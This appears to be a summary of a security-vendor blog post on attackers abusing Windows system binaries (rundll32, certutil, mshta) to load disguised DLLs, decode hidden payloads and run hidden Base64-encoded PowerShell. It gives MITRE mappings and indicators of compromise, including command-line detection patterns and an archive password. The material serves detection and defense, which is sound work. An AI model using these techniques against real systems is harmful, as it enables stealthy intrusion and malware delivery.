LOLBin attacks abuse legitimate Windows system binaries (rundll32, certutil, mshta, etc.) to load disguised modules, decode hidden payloads, or spawn in-memory execution so malicious activity appears normal. ANY.RUN’s interactive sandbox reveals process behavior, parent–child chains, command lines, and in-memory actions to expose these abuses quickly and provide actionable IOCs. #RUNDLL32 #CERTUTIL
Keypoints
- LOLBin attacks repurpose trusted Windows utilities (rundll32, certutil, mshta, powershell, regsvr32) to perform malicious actions while blending into normal system activity.
- Attackers use LOLBins to load disguised or renamed DLLs, decode or unpack payloads, trigger hidden PowerShell, and execute code entirely in memory.
- These techniques reduce forensic artifacts and signature coverage, increasing dwell time and making early detection difficult for SOC teams.
- ANY.RUN’s interactive sandbox reveals suspicious behavior immediately by showing process behavior, parent–child chains, full command lines, and in-memory artifacts.
- Real examples include rundll32 delivering Gh0st RAT via a disguised module, certutil decoding disguised archives used by PXAStealer, and mshta executing HTA that spawns hidden Base64-decoded PowerShell.
- Practical defenses include behavior-based detections, simple triage checklists (parent process, command line, execution path, decoding/script activity), sandbox confirmation, and limited policy controls (restricting execution from user folders, PowerShell controls).
- ANY.RUN customers report measurable SOC benefits such as faster triage, higher detection rates, and reduced MTTR by using interactive sandbox analysis to validate suspicious cases.
MITRE Techniques
- [T1218.011 ] Rundll32 – Used to load and run a disguised module so an attacker can execute payloads under a legitimate process; “…rundll32.exe runs the hidden module and shows clear malicious actions…”
- [T1140 ] Deobfuscate/Decode Files or Information – Certutil.exe misused to decode a disguised file (fake PDF turned into an archive) before extraction and execution; “…certutil converts it into Invoice.pdf, which is not a document at all but a RAR archive.”
- [T1218.005 ] Mshta – Mshta used to execute HTA-based scripts that spawn hidden PowerShell with Base64-encoded commands for in-memory execution; “…mshta.exe runs gg.hta, which triggers hidden PowerShell execution…A Base64-encoded command decoded and passed into Invoke-Expression”
Indicators of Compromise
- [File names ] Examples of disguised/misleading file names used in chains – grgfrqe.rfg (renamed DLL), hkjhn.exe (Temp drop)
- [Command lines ] Suspicious command-line patterns observed – commandLine:”rundll32.exe*” and commandLine:”certutil.exe*-decode” (used to find similar samples)
- [Archive/password ] Disguised archive and extraction context – protected RAR inside a file named DA 성형외과 재무 보고서.pdf and password iJbcsRBR84uUl9USIhj09PH0elalyHPJ
- [Script/HTA names ] Loader/script artifacts – gg.hta (HTA that spawns hidden PowerShell), encoded PowerShell flags (-NoProfile -WindowStyle Hidden and Base64 payload)
- [Tool usage patterns ] Behavioral IOCs summarizing multiple instances – unusual module loads by rundll32.exe, certutil -decode usage, mshta executing .hta files (and 2 more similar command-line patterns)
Read more: https://any.run/cybersecurity-blog/cybersecurity-blog/lolbin-attacks-soc-detection-guide/